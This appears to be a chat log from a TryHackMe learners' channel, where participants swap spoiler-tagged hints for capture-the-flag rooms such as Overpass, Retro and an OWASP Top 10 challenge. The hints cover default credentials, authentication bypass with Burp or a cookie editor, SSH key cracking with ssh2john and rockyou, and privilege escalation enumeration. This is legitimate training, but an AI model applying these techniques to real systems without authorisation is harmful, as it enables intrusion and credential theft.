Copy/paste from GTFOBins is boring
You have to actually understand what's going on.
Yup... Looking for ||cron|| privesc methods
You won't get it until you actually understand what's going on
Ohkayyy
for jack do we have to bruteforce the wp-admin
@green sorrel try it and find out
I am
If it takes more than 5 minutes, then either wrong user or you're not meant to
still stuck on overpass foothold. I try force to go somewhere. but it is a little tricky because I don't know where I actually want/can go. so I guess I'm again on the wrong path
@marble dagger dm me for help
@cedar coral can i dm you for help?
Yes
Anyone done with the Day 6 of OWASP room (Beginner)? I'm stuck there. I took the hint that I should go through the web app source code... It says maybe the documentation will mention default credentials.... I couldn't find any documentation. I went through all the html pages and its .js scripts. The closest I've got to is the default values in main.js? Hint?
You are looking at the frontend. Not the source code
@white salmon so you mean to say it's not 'View Page Source' or curl?
@autumn rivet Yeah its not that.
@white salmon Yes its actually not
Try to find the documentation for the code online. @autumn rivet
i need help with https://tryhackme.com/room/rpmetasploit ~ task 5 ~ #12
any hint on latest release of owasp top 10? security misconfiguration?
Checked all the source codes of the html pages, examined js files. Hint says to look in source code but there is nothing interesting there
even checked source code of ip/mynotes which is not accessible through browser
@dense saddle Its not in the actual code but you have to check if the documentation exists for that code anywhere online. DM me if you need any further hints.
Ok Sundeep thanks
@little idol what exactly you are trying to bypass?
@little idol Developer tools
Source code gives you the best hints
Any hint to get root on overpass?
I feel stuck.
@valid bough did you try linpeas?
on the overpass box, ||which software to use for authentication bypass||
@little idol I used burp, you can use anything
i searched for source code and documentation
for the Security Misconfiguration challenge of OWASP 10 I just found Go-IPFS and InfluxDB code on Github but I didn't find anything in the docs
Help me on Owasp top 10 challenge 6. I found the ||database file and the password hash but not able to crack it||
you mean day 6? There only need to read the docs
guys I'm just stuck at the overpass room, I know that there is || a broken auth || but can't deal with it, if someone could give me a nice hint it will be helpful!
@vernal goblet|| you have to go on github||
I found the ||GitHub page and got a database file with a password hash in it||
@vernal goblet It's way easier
Maybe the documentation gives you default credentials that you can try.
Look for default creds
@final mortar ?
guys how would you privesc if you connected to a box via ssh rsa (and dont have any passwords so I cant sudo -l to find any NOPASSWD)
Just read the github page and you see creds are lying around
@worn yew go-ifps-api github page?
I'm referring to owasp 10 day 6 task
@worn yew me too... I can't find github page for pensive note taking app...
there is also a plugin called || cookie editor|| you can use that too if you are lazy to turn on burp
It is there
@worn yew don't share answers
ok
@hardy quest a little search can help you
@worn yew If it may help to find it at first try, play with spaces
i got root on OverPass
@north moat Me too - 'grats (my root was about 2 mins after user - which took me hours to foothold... duh)
@north moat any hints?
yeh root, less time than user.txt
@hardy quest you may want to use ||github's search|| rather than ||google's||
@random thunder - if overpass was any more spelt out than it was already ^^above^^ - it would be a walkthru
@keen willow thanks bro! After your hint I directly found it
can i get a hint about overpass ?
@north moat I mean it's an easy rated room after all
@final mortar is it easy ?
root overpass just now !!!!
good job
@little idol hii bro can i pm you about overpass ?
@sick sun you can scroll up till today's msgs, there are a lot of hints for overpass.
hi guys, rockyou will work to crack overpass key
yes
Thanks for the hints @worn yew , @final mortar , @vernal goblet ,
It helped me a lot!
I have a question though,
How'd you figure out that you had to go to some Github page?
Where else would you go?
Some googling will take you to that page
The hint tells you to find the source code
@stuck fractal Whaoh! that's your github repo right? Awesome!
@stuck fractal I was of the view that I'd try looking at inspect element to find something
That's not the sourcecode for the webapp
@stuck fractal okay, okay
Got it
Sorry, beginner's mistake
Thanks a lot though!
Really appreciate your web app
Don't use it in production
@jade rampart can you give some hints been looking for about one and half hour
I have
Many many many hints
On the task text, and in here
@crisp wigeon On tryhackme, you use rockyou unless you're told to use something else.
@stuck fractal thanks then i have some problem...
Probably.
Shall i DM ?
Okay ..
just ask your question here @crisp wigeon, that's what the channel is for. If you're afraid that you have spoilers then just surround them in || marks
Sure ..
I tried cracking so many times but only one time it showed cracked and gave a passwd with this string ||em****d||. Tried again, nothing worked.. need to confirm this also..
so, it's double | for spoilers
Yep
||text||
Thanks @median compass @maiden moss
so you want to confirm what? that you got the right passphrase?
I got the key and I tried to crack it with John.. it's not working and at a random time, only one time I got this ||em****d|| string..
Did you use ssh2john first?
No..
Well then you're not cracking it properly
Let me do it then ..
you need to make a hash first that John can work with
on kali that's /usr/share/john/ssh2john.py
Yep will do .. thanks @median compass @stuck fractal
happy hunting
@graceful plinth Any progress? or may I give a hint?
Check the room tags, run some enum scripts
@jade rampart came up with github searches
got the password hash and salt too
any hints for root on retro? priv esc for windows is a challenge for me
Let me just check the room to refresh myself 2 seconds
thanks @trim haven !
Have you tried uploading winpeas or other tools that will look for ways of privilege escalation?
yup
gone through all the output but can't seem to find any attack vectors
maybe I just don't know what things to look for specifically?
Personally I haven't used winpeas, I have used linpeas so I'm unsure if it was the same colour-scheme style